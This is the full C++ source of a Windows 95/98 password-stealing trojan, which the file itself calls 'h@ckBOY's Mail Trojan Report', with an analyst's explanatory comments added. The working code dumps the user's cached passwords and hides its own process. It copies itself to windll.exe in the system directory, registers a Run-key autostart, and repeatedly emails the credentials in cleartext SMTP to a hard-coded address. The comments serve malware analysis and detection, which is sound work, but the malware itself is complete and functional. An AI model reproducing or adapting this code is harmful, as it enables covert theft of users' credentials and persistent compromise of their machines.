hbl.cpp

#include "stdafx.h"
// Analyst note: file-scope state shared by WinMain, WndProc and SendMail.
// Number of successful SendMail() runs after which the WM_TIMER handler in WndProc stops the timer.
int sLimit=6;
// Count of timer-driven SendMail() calls that returned 0 so far.
int sent=0;
// Value returned by SetTimer() in WinMain; handed to KillTimer() in WndProc.
unsigned int tim;

// Text buffer that CachedPass() fills with "resource : password" lines
// and that SendMail() appends to the outgoing message body.
char BufStr0[1500]="";
LRESULT CALLBACK	WndProc(HWND, UINT, WPARAM, LPARAM);

// Winsock state used by SendMail(): WSAStartup() data and the destination address.
WSADATA wsadata;
SOCKADDR_IN sin;

// Socket used for the SMTP conversation; also closed from the WM_CLOSE handler.
SOCKET sock;

// Analyst note: hand-declared record layout that the enumeration callback receives.
// WNetEnumCachedPasswords is an undocumented MPR.DLL export of Windows 95/98/Me that
// walks the logged-on user's password cache, so this file declares the types itself
// instead of taking them from an SDK header.
// As used by AddPass(): cbResource is the byte length of the resource name stored at
// abResource, and cbPassword is the byte length of the password that follows it.
// cbEntry, iEntry and nType are not read anywhere in this file.
struct PASSWORD_CACHE_ENTRY {
    WORD cbEntry;  
    WORD cbResource;
    WORD cbPassword;
    BYTE iEntry;    
    BYTE nType;     
    char abResource[1];
};

// Callback signature invoked once per cache entry; AddPass() returns FALSE when its output buffer is full.
typedef BOOL (FAR PASCAL *CACHECALLBACK)( struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData );

// Prototype of the enumeration routine; the code never links against it and resolves it at run time instead.
DWORD APIENTRY WNetEnumCachedPasswords(LPSTR pbPrefix,WORD cbPrefix,BYTE nType,CACHECALLBACK pfnCallback,DWORD dwRefData);

// Function-pointer type used for the GetProcAddress() result in CachedPass().
typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD  cbPrefix, BYTE  nType, CACHECALLBACK pfnCallback, DWORD dwRefData);


// Holds the resolved address of WNetEnumCachedPasswords once CachedPass() has run.
ENUMPASSWORD pWNetEnumCachedPasswords;

// Accumulator passed to the callback through dwRefData:
// destination buffer, its capacity in bytes, and the current write offset.
typedef struct {
	char *pBuffer;
	int nBufLen;
	int nBufPos;
} PASSCACHECALLBACK_DATA;

// Analyst note: credential-harvesting callback, invoked once per password-cache entry.
// Appends two NUL-terminated strings to the accumulator: the resource name, then the
// plaintext password stored for it.
//   pce       - cache entry handed over by the enumeration routine.
//   dwRefData - the PASSCACHECALLBACK_DATA pointer that CachedPass() passed as a DWORD;
//               this only works where a pointer fits in 32 bits.
// Returns TRUE after storing both strings, or FALSE as soon as one does not fit.
BOOL PASCAL AddPass(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData)
{
	char buff[1024];
	char buff2[1024];
	int nCount;

	PASSCACHECALLBACK_DATA *dat;
	dat = (PASSCACHECALLBACK_DATA *)dwRefData;
	
	// Resource name: cbResource bytes at abResource, capped at 1023 so the terminator fits in buff.
	nCount=pce->cbResource;
	if(nCount>1023) nCount=1023;
	memmove(buff, pce->abResource, nCount);
	buff[nCount] = 0;
	// Convert to the OEM code page before storing.
	CharToOem(buff, buff2);
	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
	// Advance past the string and its terminator.
	dat->nBufPos+=lstrlen(buff2)+1;

	// Password: cbPassword bytes stored directly after the resource name, handled the same way.
	nCount=pce->cbPassword;
	if(nCount>1023) nCount=1023;
	memmove(buff, pce->abResource+pce->cbResource, nCount);
	buff[nCount] = 0;
	CharToOem(buff, buff2);
	if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE;
	lstrcpy(dat->pBuffer+dat->nBufPos,buff2);
	dat->nBufPos+=lstrlen(buff2)+1;

	return TRUE;
}

// Analyst note: dumps the password cache into the global BufStr0 as text lines.
// Behaviour visible here:
//   - MPR.DLL is loaded and WNetEnumCachedPasswords is resolved by name at run time,
//     so the API does not appear in the import table; look for the string
//     "WNetEnumCachedPasswords" in the binary instead.
//   - the 64 KB heap buffer receiving plaintext credentials is neither cleared nor
//     freed in this function, so its contents stay in process memory.
void CachedPass()
{
   HMODULE hLib=LoadLibrary("MPR.DLL");
   	
   PASSCACHECALLBACK_DATA dat;
   dat.pBuffer=(char *)malloc(65536);
   dat.nBufLen=65536;
   dat.nBufPos=0;
   pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords");

   // NULL prefix with length 0 and type 0xff: presumably "every entry of every type" - not established by this file.
   pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat);		
   char *svStr;
   svStr=dat.pBuffer;
   strcpy(BufStr0,"");
   // Walk the buffer as (resource, password) string pairs and format one CRLF-terminated line per pair.
   do {
	     char *svRsc=svStr;
		 svStr+=lstrlen(svStr)+1;
	   	 char *svPwd=svStr;
		 svStr+=lstrlen(svStr)+1;
		 char svBuff[1024];
		 // Each field is truncated to 256 characters by the format string.
		 wsprintf(svBuff, "%.256s : %.256s\x0D\x0A", svRsc, svPwd);
         strcat(BufStr0,svBuff);
   }while(*svStr!='\0');

   FreeLibrary(hLib); 

};

// Analyst note: exfiltration step. Collects the cached passwords through CachedPass()
// and sends them as the body of one e-mail over a plain SMTP session on TCP port 25.
// Returns 1 when the connection fails and 0 once every command has been sent.
// Detection-relevant facts visible in this function:
//   - outbound TCP/25 opened by a process that is not a mail client;
//   - the session is cleartext, so the fixed Subject line and the
//     "Cached passwords:" marker can be matched on the wire;
//   - sender, recipient and server are hard-coded strings in the binary.
int SendMail()
{
	// Fixed-size command strings padded with NUL bytes. The padding presumably reserves
	// room for values patched into the built binary - not established by this file.
	char Serv[1000]="HELO 127.0.0.1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
	char From[1000]="MAIL FROM:<lamo@lam.com>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
	char To[1000]="RCPT TO:<hack@hackboy.info>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
	char sServer1[256]="SMTP: 127.0.0.1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
	char Text[1400]="Subject: :[ h@ckBOY's Mail Trojan Report ]:\x0A\x0A\x0D\x0A\x0D\x0A";
	char sServer[256]="";
	int c=0;
	// Copy sServer1 from index 6 onward into sServer, i.e. drop the 6-character
	// "SMTP: " label so that sServer holds only the dotted address.
	for(int i=0;i<=256;i++)
	  if(i>5){ sServer[c]=sServer1[i]; c++;};
    
	// Message body: marker line, the harvested "resource : password" lines, then the
	// SMTP end-of-data sequence (CRLF "." CRLF).
	CachedPass();
	strcat(Text,"Cached passwords:\x0D\x0A");
	strcat(Text,BufStr0);

	
	strcat(Text,"\x0D\x0A\x0D\x0A.\x0D\x0A");
	// SMTP dialogue in send order; the NULL entry ends the send loop below.
    char *MailMess[] =
	{
		Serv,
		From,
		To,
		"DATA\x0D\x0A",
        Text,
		"QUIT\x0D\x0A",
		NULL
	};
	// Winsock 1.1, TCP socket, destination port 25. inet_addr() only parses
	// dotted-decimal IPv4 text, so no DNS lookup is made here.
	WSAStartup(0x0101,&wsadata);
	sock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
	sin.sin_family=AF_INET;
	sin.sin_port=htons(25);
	sin.sin_addr.s_addr=inet_addr(sServer);
    if(connect(sock,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
	{
		//MessageBox(NULL,"Error: can't connect to server :(","Error",MB_OK|MB_ICONERROR);
		closesocket(sock);
	    WSACleanup();
		return 1;
	};

    int iLength = 0;
	int iEnd = 0;
	char sBuff[255] = "";
	int iMsg = 0;
	// Send each command and read one reply after it. The reply text is stored but
	// never inspected, so server status codes do not influence the flow.
    while(MailMess[iMsg])
	{
		send(sock,MailMess[iMsg],lstrlen(MailMess[iMsg]),0);
		//MessageBox(NULL,MailMess[iMsg],"Send to server:",MB_OK|MB_ICONINFORMATION);
		iLength=recv(sock,sBuff,sizeof(sBuff),0);
		sBuff[iLength]='\0';
		//MessageBox(NULL,sBuff,"Answer from server:",MB_OK|MB_ICONWARNING);
		iMsg++;
	};
	closesocket(sock);
	WSACleanup();
	return 0;
};
// Analyst note: entry point. In order, it hides the process, installs a copy of itself
// with a Run-key autostart, sends the first report, then stays resident behind a window
// that is never shown and a 25-second timer.
// Host indicators visible in this function:
//   - file  windll.exe  written to the Windows system directory;
//   - value windll = "windll.exe" under
//     HKLM\Software\Microsoft\Windows\CurrentVersion\Run;
//   - a window of class "explorer" owned by a process that is not the shell.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{   
	// RegisterServiceProcess is exported by kernel32.dll only on Windows 95/98/Me. Called
	// with (NULL,1) it marks the current process as a service, which on those systems
	// keeps it out of the Ctrl+Alt+Del task list. It is resolved by name, so it shows up
	// as a string in the binary rather than in the import table.
	typedef DWORD (WINAPI *REGSERVPROC)(DWORD, DWORD);
    HINSTANCE hLibrary;
    REGSERVPROC regprc;
    hLibrary = LoadLibrary("kernel32.dll");
    regprc = (REGSERVPROC) GetProcAddress(hLibrary, "RegisterServiceProcess");
    regprc (NULL,1);

	// Self-copy: the running executable is copied to <system directory>\windll.exe,
	// overwriting any existing file (bFailIfExists is FALSE).
	LPSTR lpMe = new TCHAR[256];
	LPSTR WinDir1 = new TCHAR[256];
	GetSystemDirectory(WinDir1,256);
	GetModuleFileName(NULL,lpMe,200);
	strcat(WinDir1,"\\windll.exe");
	CopyFile(lpMe,WinDir1,FALSE);

	// Persistence: machine-wide Run value pointing at the copied file by bare name.
	char szValue [256] = "windll.exe";
	HKEY pKey;
	RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&pKey);
	RegSetValueEx(pKey,"windll",NULL,REG_SZ,(BYTE *)szValue,strlen(szValue)+1);
    
	// First report is sent at start-up; its return value is ignored here.
	SendMail();
	MSG msg;
	WNDCLASSEX wcex;

	wcex.cbSize = sizeof(WNDCLASSEX); 

	// Window class named "explorer" with no icon, cursor, background or menu.
	wcex.style			= CS_HREDRAW | CS_VREDRAW;
	wcex.lpfnWndProc	= (WNDPROC)WndProc;
	wcex.cbClsExtra		= 0;
	wcex.cbWndExtra		= 0;
	wcex.hInstance		= hInstance;
	wcex.hIcon		= NULL;
	wcex.hCursor		= NULL;
	wcex.hbrBackground	= NULL;
	wcex.lpszMenuName	= NULL;
	wcex.lpszClassName	= "explorer";
	wcex.hIconSm		= NULL;
	RegisterClassEx(&wcex);
	// 10x10 untitled WS_POPUP window created without WS_VISIBLE; no ShowWindow() call
	// appears in this function. It exists to receive WM_TIMER messages.
	HWND hWnd;
    hWnd = CreateWindow("explorer", NULL, WS_POPUP,
	 0, 0, 10,10, NULL, NULL, hInstance, NULL);

	// 25000 ms timer with no callback, so each tick arrives in WndProc as WM_TIMER.
    tim=SetTimer(hWnd,NULL,25000,NULL);
	// Standard message loop; runs until WM_QUIT is posted.
	while (GetMessage(&msg, NULL, 0, 0)) 
	{
		{
			TranslateMessage(&msg);
			DispatchMessage(&msg);
		}
	}
    return 0;
}
// Analyst note: window procedure of the hidden "explorer"-class window.
//   WM_CLOSE - closes the global socket, shuts Winsock down and ends the message loop.
//   WM_TIMER - fires every 25 s (timer set in WinMain) and calls SendMail() again until
//              sLimit runs have succeeded, then stops the timer. Together with the call
//              in WinMain this bounds how many reports one process lifetime produces;
//              the Run-key entry starts the cycle again at the next boot.
// Every other message goes to DefWindowProc().
LRESULT CALLBACK WndProc(HWND hWnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
    switch(iMsg)
	{
	case WM_CLOSE:
		closesocket(sock);
	    WSACleanup();
		PostQuitMessage(1);
		return 1;break;
	case WM_TIMER: 
		// Only a SendMail() that returned 0 (connection made, all commands sent) counts
		// towards the limit; a failed connection is retried on the next tick.
		if(sent!=sLimit)
		{
			if(SendMail()==0) sent++;
		} else
		{
			KillTimer(hWnd,tim);
		};
		break;
	};
	return DefWindowProc(hWnd, iMsg, wParam, lParam);
};



